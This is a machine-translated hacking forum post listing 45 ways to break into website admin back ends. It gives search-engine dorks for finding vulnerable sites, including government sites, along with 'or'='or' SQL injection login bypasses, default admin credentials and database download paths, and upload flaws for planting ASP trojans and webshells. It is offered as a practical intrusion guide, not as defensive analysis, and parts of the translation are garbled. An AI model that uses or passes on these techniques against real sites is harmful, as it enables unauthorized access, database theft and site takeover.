45 methods for attacking the background (admin back end)

Source: Internet
Author: User
Tags: vbulletin

1. Google search: site:cq.cn inurl:asp

2. Search for some keywords on Google: edit.asp? South Korea has many bots, most of which are MSSQL databases!
3. Use a zombie and an ASP Trojan:
The file name is login.asp.
......
Path group is /manage/
Keyword: went.asp
Use 'or'='or' to log on
4. Because too many people have done this, some website administrators have taken preventive measures and the success rate is not high:
Keyword: "Co Net MIB Ver 1.0 website background management system"
The account password is 'or'='or'
5. Dynamic Shopping System. Think of the bright boy:
inurl:help.asp login, if not registered as a member!
You can select either upLoad_bm1.asp or upLoad_c1.asp. Generally, administrators ignore these two vulnerabilities.
6. Default database address: blogdata/acblog.asa
Keyword: acblog
7. Baidu /htdocs
You can directly upload the asa file during registration!
8. /Database/#newasp.mdb
Keywords: NewAsp SiteManageSystem Version
9. Excavator
Keyword: Powered by WEBBOY
Page: /upfile.asp
10. Search for Ver5.0 Build 0519 in baidu
(Upload vulnerability exists)
11. Upfile_Article.asp, bbs/upfile.asp
Keyword: powered by mypower
What is the upload vulnerability? There are also many users.
It is estimated that you will be able to dig the chicken.
12. inurl:winnt\system32\inetsrv\
Enter this in Google to find many websites.
13. Now GOOGLE searches for the keyword intitle:Website Assistant inurl:asp
14. Keywords: homepage latest news newbie guide dance music download center classic article gamer elegance equipment purchase station rumor friendship connection station Forum
Add setup.asp to the keyword
15. VBulletin Forum Database
Default database address!
/Shortdes/functions.php
Tools:
1) Website hunter: Baidu, Google!
2) Google
Keywords:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
One of them is enough.
16.
1) Open Baidu or GOOGLE search and enter powered by comersus ASP shopping cart
Open source.
This is a mall system.
2) There is a Comersus Open Technologies LC at the bottom of the website. Open it and check it ~~ Comersus system ~
Guess: comersus.mdb is the database name
All databases are placed under database/,
So database/comersus.mdb
Comersus_listCategoriesTree.asp is replaced by database/comersus.mdb, which cannot be downloaded.
Remove the preceding "store/" and add database/comersus.mdb.
All are default database addresses
17. Carefree legend Official Site program.
1) Backend management address: http://your domain name/msmiradmin/
Or http://your domain name/admin.asp
2) Default background management account: msmir
3) Default background management password: msmirmsmir or msmir
The database file is http://your domain name/msmirdata/msmirArticle.mdb
Or http://your domain name/msmirdata/msmirArticle.asa
The database connection file is **********/Conn.asp.
It is also the default database address. This is the legend of 4F. Well, I just got it.
18. Enter /skins/default/ in Baidu
19. Using excavators
Key servers: power by Discuz
Path: /wish.php
Cooperation:
Remote vulnerability in wish.php of the Discuz! forum
......
20. Upload Vulnerability.
Tool: Of course, it's still James.
The web site hunter or zombie.
Keyword: powered by mypower
Insert upfile_photo.asp to the detected page or file
There are also N users ..
21. New cloud Vulnerabilities
This vulnerability is available for both ACCESS and SQL.
Google searches for the keyword "about this site-website help-advertising cooperation-download Declaration-friendship connection-website map-management login"
Put flash/downfile.asp?Url=uploadfile/http://www.xxxx.com/conn.asp to the website root directory. You can download conn.asp
Most download sites, such as source code and software.
We often encounter databases that can be downloaded if they are in the front or in the middle # They can be replaced #.
\Database\#newasp.mdb
For example: # Change xzws. mdb to # xzws. mdb
Collected. I have never tried... --!
22. All shopping malls and power upload Systems
Tool used: Xiaoji v1.1 mingxiao
Mall intrusion:
Keywords: purchase-> Add to shopping cart-> go to cashier-> confirm Recipient Information-> select payment method-> select delivery method-> online payment or remittance after order-> remittance confirmation-> delivery-> complete
Vulnerability page: upload. asp
Upfile_flash.asp
Or Upload Vulnerability webshell
23. Injection Vulnerability
Baidu search ioj's blog
24. ease of operation
Column directory
Admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
Tool: web site hunter
Keywords: inurl:Went.asp
Suffix: manage/login.asp
Password: 'or'='or'
This software is not very familiar. --
26.
Intrusion into Warcraft private server
Required tool: ASP Trojan --! Nonsense.
Mingkido
Keyword: All Right Reserved Design: Game Alliance
Background address: admin/login.asp
Database address: chngame/#chngame.mdb
All are default. You can decrypt the database by yourself.
27.
The vulnerability is caused by an error in the iis settings of the Administrator.
The baidu keyword is a rare Script Name.
Dynamic Network: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
Ease of use: admin_articlerecyclebin.asp
It seems that this is not quite clear ..
28.
Database explosion vulnerability on foreign sites
Keyword: sad Raven's Guestbook

Password address: /passwd.dat
Background address: /admin.php
29.
Discuz 4.1.0 cross-site Vulnerability
Tools used: 1) WAP browser
2) WAP encoding Converter
Keyword: "intext:Discuz! 4.1.0"
WAP browser ..............................!!
30.
Keyword: sunnex
Background path: /system/manage.asp
Directly upload an ASP Trojan
Go to the excavator .. --!
31.
Tools
1: web site hunter
2: DAMA
Keywords: Do not disable Cookies; otherwise, you will not be able to log on
Insert diy.asp
32.
Keywords: Team5 Studio All rights reserved
Default Database: data/team.mdb
The rest is self-built. Not much.
33.
Tool: excavator auxiliary database Reader
Keywords: Enterprise Profile product display product list
Suffix: /database/myszw.mdb
Background address: admin/Login.asp
All are default. Same. When the database goes off, unlock the password. That's all .. --
34.
Keyword: XXX inurl:Nclass.asp
......
Write a trojan in system settings.
Will be saved to config.asp.
35.
Use WEBSHELL without entering the background
Data.asp?Action=BackupData is the default path for online database backup
I have never tried... I don't know.
36.
Tool: WebShell
Keyword: inurl:Went.asp
Suffix: manage/login.asp
Weak Password: 'or'='or'
I have never tried it. ......
37.
Keyword: Powered by CDN_NEWS
Scan the article and add a ' to test the injection points.
Background address: admin_index.asp
I won't say anything about the tool .........
38.
Intrude into leichi News Publishing System
Keyword: leichinews
Remove the values after leichinews.
Mark: admin/uploadPic.asp?ActionType=mod&picName=xuanran.asp
Upload another Trojan .....
Access uppic anran.asp to log on to the Trojan.
--
No. Sweat, collected.
39.
The tool excavator is enough.
Keyword: Power System Of Article Management Ver 3.0 Build 20030628
Default database: database\yiuwekdsodksldfslwifds.mdb
Background address: scan by yourself!
Tool. --! Why is it him.
MD5 solution .........
(NND: a lot. You can try it ..)
40.
1. Search for a large number of injection points through GOOGLE
Keyword: asp? Id = 1 gov.jp/asp? Id =
Page: 100
Language: Enter the language of the country you want to intrude.
41.
Keyword: Powered by: 94 KKBBS 2005
Retrieve admin Using password retrieval
Q: ddddd answer: ddddd
42.
Keyword: inurl:Went.asp
The background is manage/login.asp.
Background password: 'or' = 'or "=" or '.
Default database address: Database/DataShop.mdb
43.
Keyword: ***** inurl:readnews.asp
Change the last / to \. The database is exposed to brute force attacks, check the password, and enter the background.
Add a piece of news and enter a trojan in the title.
44.
Tool: one-sentence Trojan
BBsXp 5.0 sp1 administrator Interpreter
Keywords: powered by bbsxp5.00
Back up a sentence in the background!
45.
Keywords: Program core: BJXSHOP online shop expert
Background: /admin

 
